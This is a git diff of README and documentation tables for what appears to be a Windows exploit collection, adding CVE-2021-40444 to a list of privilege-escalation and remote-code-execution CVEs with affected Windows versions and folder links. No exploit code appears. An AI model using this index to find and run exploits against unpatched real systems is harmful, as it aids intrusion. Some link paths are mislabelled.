+| [CVE-2020-0787](./CVE-2020-0787) | Windows Background Intelligent Transfer Service | Windows 7/8/10/2008/2012/2016/2019 | +| [CVE-2019-0808](.CVE-2019-0808) | Win32k Elevation of Privilege | Windows 7/2008 | +| [CVE-2019-0623](.CVE-2019-0808) | Win32k Elevation of Privilege | Windows 7/8.1/10/2008/2012/2016/Serve | +| [CVE-2019-1458](./CVE-2019-1458) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016 | +| [CVE-2019-1388](./CVE-2019-1388) | Windows Certificate Dialog Elevation of Privilege | Windows 7/8/2008/2012/2016/2019 | +| [CVE-2019-0859](./TestFailure/) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016/2019 | +| [CVE-2019-0803](./CVE-2019-0803) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016/2019 | +| [CVE-2018-8639](./CVE-2018-8639) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016/2019 | +| [CVE-2018-8453](./CVE-2018-8453) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016/2019 | +| [CVE-2018-8440](./TestFailure/CVE-2018-8440) | Windows ALPC Elevation of Privilege | Windows 7/8/10/2008/2012/2016 | +| [CVE-2018-8120](./CVE-2018-8120) | Win32k Elevation of Privilege | Windows 7/2008 | +| [CVE-2018-1038](./TestFailure/CVE-2018-1038) | Windows Kernel Elevation of Privilege | Windows 7/2008 | +| [CVE-2018-0743](./TestFailure/CVE-2018-0743) | Windows Subsystem for Linux Elevation of Privilege | Windows 10/2016 | +| [CVE-2018-0833](./CVE-2018-0833) | SMBv3 Null Pointer Dereference Denial of Service | Windows 8/2012 | +| [CVE-2017-8464](./CVE-2017-8464) | LNK Remote Code Execution | Windows 7/8/10/2008/2012/2016 | +| [CVE-2017-0213](./CVE-2017-0213) | Windows COM Elevation of Privilege | Windows 7/8/10/2008/2012/2016 | +| [CVE-2017-0143](./CVE-2017-0143) | Windows Kernel Mode Drivers | Windows 7/8/10/2008/2012/2016/Vista | +| [CVE-2017-0101](./CVE-2017-0101) | GDI Palette Objects Local Privilege Escalation | Windows 7/8/10/2008/2012/Vista | +| [CVE-2016-7255](./CVE-2016-7255) | Windows Kernel Mode Drivers | Windows 7/8/10/2008/2012/2016/Vista | +| [CVE-2016-3371](./CVE-2016-3371) | Windows Kernel Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | +| [CVE-2016-3309](./TestFailure/CVE-2016-3309) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | +| [CVE-2016-3225](./CVE-2016-3225) | Windows SMB Server Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | +| [CVE-2016-0099](./CVE-2016-0099) | Secondary Logon Handle | Windows 7/8/10/2008/2012/Vista | +| [CVE-2016-0095](./CVE-2016-0095) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | +| [CVE-2016-0051](./CVE-2016-0051) | WebDAV Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | +| [CVE-2016-0041](./CVE-2016-0041) | Win32k Memory Corruption Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | +| [CVE-2015-2546](./CVE-2015-2546) | Win32k Memory Corruption Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | +| [CVE-2015-2387](./CVE-2015-2387) | ATMFD.DLL Memory Corruption | Windows 7/8/2003/2008/2012/Vista/Rt | +| [CVE-2015-2370](./CVE-2015-2370) | Windows RPC Elevation of Privilege | Windows 7/8/10/2003/2008/2012/Vista | +| [CVE-2015-1725](./TestFailure/CVE-2015-1725) | Win32k Elevation of Privilege | Windows 7/8/10/2003/2008/2012/Vista | +| [CVE-2015-1701](./CVE-2015-1701) | Windows Kernel Mode Drivers | Windows 7/2003/2008/Vista | +| [CVE-2015-0062](./TestFailure/CVE-2015-0062) | Windows Create Process Elevation of Privilege | Windows 7/8/2008/2012 | +| [CVE-2015-0057](./CVE-2015-0057) | Win32k Elevation of Privilege | Windows 7/8/2003/2008/2012/Vista | +| [CVE-2015-0003](./CVE-2015-0003) | Win32k Elevation of Privilege | Windows 7/8/2003/2008/2012/Vista | +| [CVE-2015-0002](./TestFailure/CVE-2015-0002) | Microsoft Application Compatibility Infrastructure Elevation of Privilege | Windows 7/8/2003/2008/2012 | +| [CVE-2014-6324](./TestFailure/CVE-2014-6324) | Kerberos Checksum Vulnerability | Windows 7/8/2003/2008/2012/Vista | +| [CVE-2014-6321](./TestFailure/CVE-2014-6321) | Microsoft Schannel Remote Code Execution | Windows 7/8/2003/2008/2012/Vista | +| [CVE-2014-4113](./CVE-2014-4113) | Win32k.sys Elevation of Privilege | Windows 7/8/2003/2008/2012/Vista | +| [CVE-2014-4076](./CVE-2014-4076) | TCP/IP Elevation of Privilege | Windows 2003 | +| [CVE-2014-1767](./CVE-2014-1767) | Ancillary Function Driver Elevation of Privilege | Windows 7/8/2003/2008/2012/Vista | +| [CVE-2013-5065](./TestFailure/CVE-2013-5065) | NDProxy.sys | Windows XP/2003 | +| [CVE-2013-1345](./CVE-2013-1345) | Kernel Driver | Windows 7/8/2003/2008/2012/Vista/Rt/Xp | +| [CVE-2013-1332](./CVE-2013-1332) | DirectX Graphics Kernel Subsystem Double Fetch | Windows 7/8/2003/2008/2012/Vista/Rt | +| [CVE-2013-0008](./TestFailure/CVE-2013-0008) | Win32k Improper Message Handling | Windows 7/8/2008/2012/Vista/Rt | +| [CVE-2012-0217](./CVE-2012-0217) | Service Bus | Windows 7/2003/2008/Xp | +| [CVE-2012-0002](./TestFailure/CVE-2012-0002) | Remote Desktop Protocol | Windows 7/2003/2008/Vista/Xp | +| [CVE-2011-2005](./CVE-2011-2005) | Ancillary Function Driver Elevation of Privilege | Windows 2003/Xp | +| [CVE-2011-1974](./CVE-2011-1974) | NDISTAPI Elevation of Privilege | Windows 2003/Xp | +| [CVE-2011-1249](./CVE-2011-1249) | Ancillary Function Driver Elevation of Privilege | Windows 7/2003/2008/Vista/Xp | +| [CVE-2011-0045](./TestFailure/CVE-2011-0045) | Windows Kernel Integer Truncation | Windows Xp | +| [CVE-2010-4398](./CVE-2010-4398) | Driver Improper Interaction with Windows Kernel | Windows 7/2003/2008/Vista/Xp | +| [CVE-2010-3338](./CVE-2010-3338) | Task Scheduler | Windows 7/2008/Vista | +| [CVE-2010-2554](./TestFailure/CVE-2010-2554) | Tracing Registry Key ACL | Windows 7/2008/Vista | +| [CVE-2010-1897](./CVE-2010-1897) | Win32k Window Creation | Windows 7/2003/2008/Vista/Xp | +| [CVE-2010-0270](./CVE-2010-0270) | SMB Client Transaction | Windows 7/2008 | +| [CVE-2010-0233](./CVE-2010-0233) | Windows Kernel Double Free | Windows 2000/2003/2008/Vista/Xp | +| [CVE-2010-0020](./TestFailure/CVE-2010-0020) | SMB Pathname Overflow | Windows 7/2000/2003/2008/Vista/Xp | +| [CVE-2009-2532](./CVE-2009-2532) | SMBv2 Command Value | Windows 2008/Vista | +| [CVE-2009-0079](./TestFailure/CVE-2009-0079) | Windows RPCSS Service Isolation | Windows 2003/Xp | +| [CVE-2008-4250](./CVE-2008-4250) | Server Service | Windows 2000/2003/Vista/Xp | +| [CVE-2008-4037](./CVE-2008-4037) | SMB Credential Reflection | Windows 2000/2003/2008/Vista/Xp | +| [CVE-2008-3464](./CVE-2008-3464) | AFD Kernel Overwrite | Windows 2003/Xp | +| [CVE-2008-1084](./CVE-2008-1084) | Win32.sys | Windows 2000/2003/2008/Vista/Xp | +| [CVE-2006-3439](./CVE-2006-3439) | Remote Code Execution | Windows 2000/2003/Xp | +| [CVE-2005-1983](./TestFailure/CVE-2005-1983) | PnP Service | Windows 2000/Xp | +| [CVE-2003-0352](./CVE-2003-0352) | Buffer Overrun In RPC Interface | Windows 2000/2003/Xp/Nt | diff --git a/README.md b/README.md index 3182bac..b6d5e77 100644 --- a/README.md +++ b/README.md @@ -28,91 +28,92 @@ In the project, the lack of ordinary order documentation, if English is good, fr > Numbered list -| SecurityBulletin | Description | OperatingSystem | -| :--------------------------------------------- | :----------------------------------------------------------: | :-----------------------------------------: | -| [CVE-2021-36934](./CVE-2021-36934) | Windows Elevation | Windows 10 | -| [CVE-2021-33739](./CVE-2021-33739) | Microsoft DWM Core Library Elevation | Windows 10/Server | -| [CVE-2021-26868](./CVE-2021-33739) | Windows Graphics Component Elevation | Windows 8.1/10/2012/2016/2019/Server | -| [CVE-2021-1732](./CVE-2021-1732) | Windows Win32k | Windows 10/2019/Server | -| [CVE-2021-1709](./TestFailure/CVE-2021-1709) | Windows Win32k | Windows 7/8.1/10/2008/2012/2016/2019/Server | -| [CVE-2020-17087](./TestFailure/CVE-2020-17087) | Windows Kernel Local Elevation of Privilege | Windows 7/8.1/10/2008/2012/2016/2019/Server | -| [CVE-2020-16938](./CVE-2020-16938) | Windows Kernel Information Disclosure | Windows Server | -| [CVE-2020-16898](./CVE-2020-16898) | Windows TCP/IP Remote Code Execution | Windows 10/2019/Server | -| [CVE-2020-1337](./CVE-2020-1337) | Windows Print Spooler Elevation | Windows 7/8.1/10/2008/2012/2016/2019/Server | -| [CVE-2020-1313](./CVE-2020-1313) | Windows Update Orchestrator Service Elevation | Windows 10/Server | -| [CVE-2020-1066](./CVE-2020-1066) | .NET Framework Elevation | Windows 7/2008 | -| [CVE-2020-1054](./CVE-2020-1054) | Win32k Elevation of Privilege | Windows 7/8.1/10/2008/2012/2016/2019/Server | -| [CVE-2020-1472](./CVE-2020-1472) | Netlogon Elevation of Privilege | Windows 2008/2012/2016/2019/Server | -| [CVE-2020-0668](./CVE-2020-0668) | Windows Kernel Elevation of Privilege | Windows 7/8.1/10/2008/2012/2016/2019/Serve | -| [CVE-2020-1015](./CVE-2020-1015) | Windows Elevation of Privilege | Windows 7/8.1/10/2008/2012/2016/2019/Server | -| [CVE-2020-0796](./CVE-2020-0796) | SMBv3 Remote Code Execution | Windows Server | -| [CVE-2020-0787](./CVE-2020-0787) | Windows Background Intelligent Transfer Service | Windows 7/8/10/2008/2012/2016/2019 | -| [CVE-2019-0808](.CVE-2019-0808) | Win32k Elevation of Privilege | Windows 7/2008 | -| [CVE-2020-0683](./CVE-2020-0683) | Windows Installer Elevation of Privilege | Windows 7/8.1/10/2008/2012/2016/2019/Server | -| [CVE-2019-0623](.CVE-2019-0808) | Win32k Elevation of Privilege | Windows 7/8.1/10/2008/2012/2016/Serve | -| [CVE-2019-1458](./CVE-2019-1458) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016 | -| [CVE-2019-1388](./CVE-2019-1388) | Windows Certificate Dialog Elevation of Privilege | Windows 7/8/2008/2012/2016/2019 | -| [CVE-2019-0859](./TestFailure/) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016/2019 | -| [CVE-2019-0803](./CVE-2019-0803) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016/2019 | -| [CVE-2018-8639](./CVE-2018-8639) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016/2019 | -| [CVE-2018-8453](./CVE-2018-8453) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016/2019 | -| [CVE-2018-8440](./TestFailure/CVE-2018-8440) | Windows ALPC Elevation of Privilege | Windows 7/8/10/2008/2012/2016 | -| [CVE-2018-8120](./CVE-2018-8120) | Win32k Elevation of Privilege | Windows 7/2008 | -| [CVE-2018-1038](./TestFailure/CVE-2018-1038) | Windows Kernel Elevation of Privilege | Windows 7/2008 | -| [CVE-2018-0743](./TestFailure/CVE-2018-0743) | Windows Subsystem for Linux Elevation of Privilege | Windows 10/2016 | -| [CVE-2018-0833](./CVE-2018-0833) | SMBv3 Null Pointer Dereference Denial of Service | Windows 8/2012 | -| [CVE-2017-8464](./CVE-2017-8464) | LNK Remote Code Execution | Windows 7/8/10/2008/2012/2016 | -| [CVE-2017-0213](./CVE-2017-0213) | Windows COM Elevation of Privilege | Windows 7/8/10/2008/2012/2016 | -| [CVE-2017-0143](./CVE-2017-0143) | Windows Kernel Mode Drivers | Windows 7/8/10/2008/2012/2016/Vista | -| [CVE-2017-0101](./CVE-2017-0101) | GDI Palette Objects Local Privilege Escalation | Windows 7/8/10/2008/2012/Vista | -| [CVE-2016-7255](./CVE-2016-7255) | Windows Kernel Mode Drivers | Windows 7/8/10/2008/2012/2016/Vista | -| [CVE-2016-3371](./CVE-2016-3371) | Windows Kernel Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | -| [CVE-2016-3309](./TestFailure/CVE-2016-3309) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | -| [CVE-2016-3225](./CVE-2016-3225) | Windows SMB Server Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | -| [CVE-2016-0099](./CVE-2016-0099) | Secondary Logon Handle | Windows 7/8/10/2008/2012/Vista | -| [CVE-2016-0095](./CVE-2016-0095) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | -| [CVE-2016-0051](./CVE-2016-0051) | WebDAV Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | -| [CVE-2016-0041](./CVE-2016-0041) | Win32k Memory Corruption Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | -| [CVE-2015-2546](./CVE-2015-2546) | Win32k Memory Corruption Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | -| [CVE-2015-2387](./CVE-2015-2387) | ATMFD.DLL Memory Corruption | Windows 7/8/2003/2008/2012/Vista/Rt | -| [CVE-2015-2370](./CVE-2015-2370) | Windows RPC Elevation of Privilege | Windows 7/8/10/2003/2008/2012/Vista | -| [CVE-2015-1725](./TestFailure/CVE-2015-1725) | Win32k Elevation of Privilege | Windows 7/8/10/2003/2008/2012/Vista | -| [CVE-2015-1701](./CVE-2015-1701) | Windows Kernel Mode Drivers | Windows 7/2003/2008/Vista | -| [CVE-2015-0062](./TestFailure/CVE-2015-0062) | Windows Create Process Elevation of Privilege | Windows 7/8/2008/2012 | -| [CVE-2015-0057](./CVE-2015-0057) | Win32k Elevation of Privilege | Windows 7/8/2003/2008/2012/Vista | -| [CVE-2015-0003](./CVE-2015-0003) | Win32k Elevation of Privilege | Windows 7/8/2003/2008/2012/Vista | -| [CVE-2015-0002](./TestFailure/CVE-2015-0002) | Microsoft Application Compatibility Infrastructure Elevation of Privilege | Windows 7/8/2003/2008/2012 | -| [CVE-2014-6324](./TestFailure/CVE-2014-6324) | Kerberos Checksum Vulnerability | Windows 7/8/2003/2008/2012/Vista | -| [CVE-2014-6321](./TestFailure/CVE-2014-6321) | Microsoft Schannel Remote Code Execution | Windows 7/8/2003/2008/2012/Vista | -| [CVE-2014-4113](./CVE-2014-4113) | Win32k.sys Elevation of Privilege | Windows 7/8/2003/2008/2012/Vista | -| [CVE-2014-4076](./CVE-2014-4076) | TCP/IP Elevation of Privilege | Windows 2003 | -| [CVE-2014-1767](./CVE-2014-1767) | Ancillary Function Driver Elevation of Privilege | Windows 7/8/2003/2008/2012/Vista | -| [CVE-2013-5065](./TestFailure/CVE-2013-5065) | NDProxy.sys | Windows XP/2003 | -| [CVE-2013-1345](./CVE-2013-1345) | Kernel Driver | Windows 7/8/2003/2008/2012/Vista/Rt/Xp | -| [CVE-2013-1332](./CVE-2013-1332) | DirectX Graphics Kernel Subsystem Double Fetch | Windows 7/8/2003/2008/2012/Vista/Rt | -| [CVE-2013-0008](./TestFailure/CVE-2013-0008) | Win32k Improper Message Handling | Windows 7/8/2008/2012/Vista/Rt | -| [CVE-2012-0217](./CVE-2012-0217) | Service Bus | Windows 7/2003/2008/Xp | -| [CVE-2012-0002](./TestFailure/CVE-2012-0002) | Remote Desktop Protocol | Windows 7/2003/2008/Vista/Xp | -| [CVE-2011-2005](./CVE-2011-2005) | Ancillary Function Driver Elevation of Privilege | Windows 2003/Xp | -| [CVE-2011-1974](./CVE-2011-1974) | NDISTAPI Elevation of Privilege | Windows 2003/Xp | -| [CVE-2011-1249](./CVE-2011-1249) | Ancillary Function Driver Elevation of Privilege | Windows 7/2003/2008/Vista/Xp | -| [CVE-2011-0045](./TestFailure/CVE-2011-0045) | Windows Kernel Integer Truncation | Windows Xp | -| [CVE-2010-4398](./CVE-2010-4398) | Driver Improper Interaction with Windows Kernel | Windows 7/2003/2008/Vista/Xp | -| [CVE-2010-3338](./CVE-2010-3338) | Task Scheduler | Windows 7/2008/Vista | -| [CVE-2010-2554](./TestFailure/CVE-2010-2554) | Tracing Registry Key ACL | Windows 7/2008/Vista | -| [CVE-2010-1897](./CVE-2010-1897) | Win32k Window Creation | Windows 7/2003/2008/Vista/Xp | -| [CVE-2010-0270](./CVE-2010-0270) | SMB Client Transaction | Windows 7/2008 | -| [CVE-2010-0233](./CVE-2010-0233) | Windows Kernel Double Free | Windows 2000/2003/2008/Vista/Xp | -| [CVE-2010-0020](./TestFailure/CVE-2010-0020) | SMB Pathname Overflow | Windows 7/2000/2003/2008/Vista/Xp | -| [CVE-2009-2532](./CVE-2009-2532) | SMBv2 Command Value | Windows 2008/Vista | -| [CVE-2009-0079](./TestFailure/CVE-2009-0079) | Windows RPCSS Service Isolation | Windows 2003/Xp | -| [CVE-2008-4250](./CVE-2008-4250) | Server Service | Windows 2000/2003/Vista/Xp | -| [CVE-2008-4037](./CVE-2008-4037) | SMB Credential Reflection | Windows 2000/2003/2008/Vista/Xp | -| [CVE-2008-3464](./CVE-2008-3464) | AFD Kernel Overwrite | Windows 2003/Xp | -| [CVE-2008-1084](./CVE-2008-1084) | Win32.sys | Windows 2000/2003/2008/Vista/Xp | -| [CVE-2006-3439](./CVE-2006-3439) | Remote Code Execution | Windows 2000/2003/Xp | -| [CVE-2005-1983](./TestFailure/CVE-2005-1983) | PnP Service | Windows 2000/Xp | -| [CVE-2003-0352](./CVE-2003-0352) | Buffer Overrun In RPC Interface | Windows 2000/2003/Xp/Nt | +| SecurityBulletin | Description | OperatingSystem | +| :--------------------------------------------- | :----------------------------------------------------------: | :----------------------------------------------: | +| [CVE-2021-40444](./CVE-2021-40444) | Windows IE RCE | Windows 7/8.1/10/2008/2012/2016/2019/2022/Server | +| [CVE-2021-36934](./CVE-2021-36934) | Windows Elevation | Windows 10 | +| [CVE-2021-33739](./CVE-2021-33739) | Microsoft DWM Core Library Elevation | Windows 10/Server | +| [CVE-2021-26868](./CVE-2021-33739) | Windows Graphics Component Elevation | Windows 8.1/10/2012/2016/2019/Server | +| [CVE-2021-1732](./CVE-2021-1732) | Windows Win32k | Windows 10/2019/Server | +| [CVE-2021-1709](./TestFailure/CVE-2021-1709) | Windows Win32k | Windows 7/8.1/10/2008/2012/2016/2019/Server | +| [CVE-2020-17087](./TestFailure/CVE-2020-17087) | Windows Kernel Local Elevation of Privilege | Windows 7/8.1/10/2008/2012/2016/2019/Server | +| [CVE-2020-16938](./CVE-2020-16938) | Windows Kernel Information Disclosure | Windows Server | +| [CVE-2020-16898](./CVE-2020-16898) | Windows TCP/IP Remote Code Execution | Windows 10/2019/Server | +| [CVE-2020-1337](./CVE-2020-1337) | Windows Print Spooler Elevation | Windows 7/8.1/10/2008/2012/2016/2019/Server | +| [CVE-2020-1313](./CVE-2020-1313) | Windows Update Orchestrator Service Elevation | Windows 10/Server | +| [CVE-2020-1066](./CVE-2020-1066) | .NET Framework Elevation | Windows 7/2008 | +| [CVE-2020-1054](./CVE-2020-1054) | Win32k Elevation of Privilege | Windows 7/8.1/10/2008/2012/2016/2019/Server | +| [CVE-2020-1472](./CVE-2020-1472) | Netlogon Elevation of Privilege | Windows 2008/2012/2016/2019/Server | +| [CVE-2020-0668](./CVE-2020-0668) | Windows Kernel Elevation of Privilege | Windows 7/8.1/10/2008/2012/2016/2019/Serve | +| [CVE-2020-1015](./CVE-2020-1015) | Windows Elevation of Privilege | Windows 7/8.1/10/2008/2012/2016/2019/Server | +| [CVE-2020-0796](./CVE-2020-0796) | SMBv3 Remote Code Execution | Windows Server | +| [CVE-2020-0787](./CVE-2020-0787) | Windows Background Intelligent Transfer Service | Windows 7/8/10/2008/2012/2016/2019 | +| [CVE-2019-0808](.CVE-2019-0808) | Win32k Elevation of Privilege | Windows 7/2008 | +| [CVE-2020-0683](./CVE-2020-0683) | Windows Installer Elevation of Privilege | Windows 7/8.1/10/2008/2012/2016/2019/Server | +| [CVE-2019-0623](.CVE-2019-0808) | Win32k Elevation of Privilege | Windows 7/8.1/10/2008/2012/2016/Serve | +| [CVE-2019-1458](./CVE-2019-1458) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016 | +| [CVE-2019-1388](./CVE-2019-1388) | Windows Certificate Dialog Elevation of Privilege | Windows 7/8/2008/2012/2016/2019 | +| [CVE-2019-0859](./TestFailure/) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016/2019 | +| [CVE-2019-0803](./CVE-2019-0803) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016/2019 | +| [CVE-2018-8639](./CVE-2018-8639) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016/2019 | +| [CVE-2018-8453](./CVE-2018-8453) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/2016/2019 | +| [CVE-2018-8440](./TestFailure/CVE-2018-8440) | Windows ALPC Elevation of Privilege | Windows 7/8/10/2008/2012/2016 | +| [CVE-2018-8120](./CVE-2018-8120) | Win32k Elevation of Privilege | Windows 7/2008 | +| [CVE-2018-1038](./TestFailure/CVE-2018-1038) | Windows Kernel Elevation of Privilege | Windows 7/2008 | +| [CVE-2018-0743](./TestFailure/CVE-2018-0743) | Windows Subsystem for Linux Elevation of Privilege | Windows 10/2016 | +| [CVE-2018-0833](./CVE-2018-0833) | SMBv3 Null Pointer Dereference Denial of Service | Windows 8/2012 | +| [CVE-2017-8464](./CVE-2017-8464) | LNK Remote Code Execution | Windows 7/8/10/2008/2012/2016 | +| [CVE-2017-0213](./CVE-2017-0213) | Windows COM Elevation of Privilege | Windows 7/8/10/2008/2012/2016 | +| [CVE-2017-0143](./CVE-2017-0143) | Windows Kernel Mode Drivers | Windows 7/8/10/2008/2012/2016/Vista | +| [CVE-2017-0101](./CVE-2017-0101) | GDI Palette Objects Local Privilege Escalation | Windows 7/8/10/2008/2012/Vista | +| [CVE-2016-7255](./CVE-2016-7255) | Windows Kernel Mode Drivers | Windows 7/8/10/2008/2012/2016/Vista | +| [CVE-2016-3371](./CVE-2016-3371) | Windows Kernel Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | +| [CVE-2016-3309](./TestFailure/CVE-2016-3309) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | +| [CVE-2016-3225](./CVE-2016-3225) | Windows SMB Server Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | +| [CVE-2016-0099](./CVE-2016-0099) | Secondary Logon Handle | Windows 7/8/10/2008/2012/Vista | +| [CVE-2016-0095](./CVE-2016-0095) | Win32k Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | +| [CVE-2016-0051](./CVE-2016-0051) | WebDAV Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | +| [CVE-2016-0041](./CVE-2016-0041) | Win32k Memory Corruption Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | +| [CVE-2015-2546](./CVE-2015-2546) | Win32k Memory Corruption Elevation of Privilege | Windows 7/8/10/2008/2012/Vista | +| [CVE-2015-2387](./CVE-2015-2387) | ATMFD.DLL Memory Corruption | Windows 7/8/2003/2008/2012/Vista/Rt | +| [CVE-2015-2370](./CVE-2015-2370) | Windows RPC Elevation of Privilege | Windows 7/8/10/2003/2008/2012/Vista | +| [CVE-2015-1725](./TestFailure/CVE-2015-1725) | Win32k Elevation of Privilege | Windows 7/8/10/2003/2008/2012/Vista | +| [CVE-2015-1701](./CVE-2015-1701) | Windows Kernel Mode Drivers | Windows 7/2003/2008/Vista | +| [CVE-2015-0062](./TestFailure/CVE-2015-0062) | Windows Create Process Elevation of Privilege | Windows 7/8/2008/2012 | +| [CVE-2015-0057](./CVE-2015-0057) | Win32k Elevation of Privilege | Windows 7/8/2003/2008/2012/Vista | +| [CVE-2015-0003](./CVE-2015-0003) | Win32k Elevation of Privilege | Windows 7/8/2003/2008/2012/Vista | +| [CVE-2015-0002](./TestFailure/CVE-2015-0002) | Microsoft Application Compatibility Infrastructure Elevation of Privilege | Windows 7/8/2003/2008/2012 | +| [CVE-2014-6324](./TestFailure/CVE-2014-6324) | Kerberos Checksum Vulnerability | Windows 7/8/2003/2008/2012/Vista | +| [CVE-2014-6321](./TestFailure/CVE-2014-6321) | Microsoft Schannel Remote Code Execution | Windows 7/8/2003/2008/2012/Vista | +| [CVE-2014-4113](./CVE-2014-4113) | Win32k.sys Elevation of Privilege | Windows 7/8/2003/2008/2012/Vista | +| [CVE-2014-4076](./CVE-2014-4076) | TCP/IP Elevation of Privilege | Windows 2003 | +| [CVE-2014-1767](./CVE-2014-1767) | Ancillary Function Driver Elevation of Privilege | Windows 7/8/2003/2008/2012/Vista | +| [CVE-2013-5065](./TestFailure/CVE-2013-5065) | NDProxy.sys | Windows XP/2003 | +| [CVE-2013-1345](./CVE-2013-1345) | Kernel Driver | Windows 7/8/2003/2008/2012/Vista/Rt/Xp | +| [CVE-2013-1332](./CVE-2013-1332) | DirectX Graphics Kernel Subsystem Double Fetch | Windows 7/8/2003/2008/2012/Vista/Rt | +| [CVE-2013-0008](./TestFailure/CVE-2013-0008) | Win32k Improper Message Handling | Windows 7/8/2008/2012/Vista/Rt | +| [CVE-2012-0217](./CVE-2012-0217) | Service Bus | Windows 7/2003/2008/Xp | +| [CVE-2012-0002](./TestFailure/CVE-2012-0002) | Remote Desktop Protocol | Windows 7/2003/2008/Vista/Xp | +| [CVE-2011-2005](./CVE-2011-2005) | Ancillary Function Driver Elevation of Privilege | Windows 2003/Xp | +| [CVE-2011-1974](./CVE-2011-1974) | NDISTAPI Elevation of Privilege | Windows 2003/Xp | +| [CVE-2011-1249](./CVE-2011-1249) | Ancillary Function Driver Elevation of Privilege | Windows 7/2003/2008/Vista/Xp | +| [CVE-2011-0045](./TestFailure/CVE-2011-0045) | Windows Kernel Integer Truncation | Windows Xp | +| [CVE-2010-4398](./CVE-2010-4398) | Driver Improper Interaction with Windows Kernel | Windows 7/2003/2008/Vista/Xp | +| [CVE-2010-3338](./CVE-2010-3338) | Task Scheduler | Windows 7/2008/Vista | +| [CVE-2010-2554](./TestFailure/CVE-2010-2554) | Tracing Registry Key ACL | Windows 7/2008/Vista | +| [CVE-2010-1897](./CVE-2010-1897) | Win32k Window Creation | Windows 7/2003/2008/Vista/Xp | +| [CVE-2010-0270](./CVE-2010-0270) | SMB Client Transaction | Windows 7/2008 | +| [CVE-2010-0233](./CVE-2010-0233) | Windows Kernel Double Free | Windows 2000/2003/2008/Vista/Xp | +| [CVE-2010-0020](./TestFailure/CVE-2010-0020) | SMB Pathname Overflow | Windows 7/2000/2003/2008/Vista/Xp | +| [CVE-2009-2532](./CVE-2009-2532) | SMBv2 Command Value | Windows 2008/Vista | +| [CVE-2009-0079](./TestFailure/CVE-2009-0079) | Windows RPCSS Service Isolation | Windows 2003/Xp | +| [CVE-2008-4250](./CVE-2008-4250) | Server Service | Windows 2000/2003/Vista/Xp | +| [CVE-2008-4037](./CVE-2008-4037) | SMB Credential Reflection | Windows 2000/2003/2008/Vista/Xp | +| [CVE-2008-3464](./CVE-2008-3464) | AFD Kernel Overwrite | Windows 2003/Xp | +| [CVE-2008-1084](./CVE-2008-1084) | Win32.sys | Windows 2000/2003/2008/Vista/Xp | +| [CVE-2006-3439](./CVE-2006-3439) | Remote Code Execution | Windows 2000/2003/Xp | +| [CVE-2005-1983](./TestFailure/CVE-2005-1983) | PnP Service | Windows 2000/Xp | +| [CVE-2003-0352](./CVE-2003-0352) | Buffer Overrun In RPC Interface | Windows 2000/2003/Xp/Nt | diff --git a/docs/Docs/Home.md b/docs/Docs/Home.md index 037ef35..a83b0b2 100644 --- a/docs/Docs/Home.md +++ b/docs/Docs/Home.md @@ -1,84 +1,85 @@ -| SecurityBulletin | Description | OperatingSystem | -| :----------------------------------------------------------- | :----------------------------------------------------------: | :-----------------------------------------: | -| [CVE-2021-36934](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2021-36934) | Windows Elevation | Windows 10 | -| [CVE-2021-33739](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2021-33739) | Microsoft DWM Core Library Elevation | Windows 10/Server | -| [CVE-2021-26868](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2021-33739) | Windows Graphics Component Elevation | Windows 8.1/10/2012/2016/2019/Server | -| [CVE-2021-1732](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2021-1732) | Windows Win32k | Windows 10/2019/Server | -| [CVE-2021-1709](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2021-1709) | Windows Win32k | Windows 7/8.1/10/2008/2012/2016/2019/Server | -| [CVE-2020-17087](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-17087) | Windows Kernel Local Elevation of Privilege Vulnerability | Windows 7/8.1/10/2008/2012/2016/2019/Server | -| [CVE-2020-16938](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-16938) | Windows Kernel Information Disclosure Vulnerability | Windows Server | -| [CVE-2020-16898](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-16898) | Windows TCP/IP Remote Code Execution Vulnerability | Windows 10/2019/Server | -| [CVE-2020-1337](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-1337) | Windows Print Spooler Elevation | Windows 7/8.1/10/2008/2012/2016/2019/Server | -| [CVE-2020-1313](http://kernelhub.ascotbe.com/Docs/#/CN/CVE-2020-1313) | Windows Update Orchestrator Service Elevation | Windows 10/Server | -| 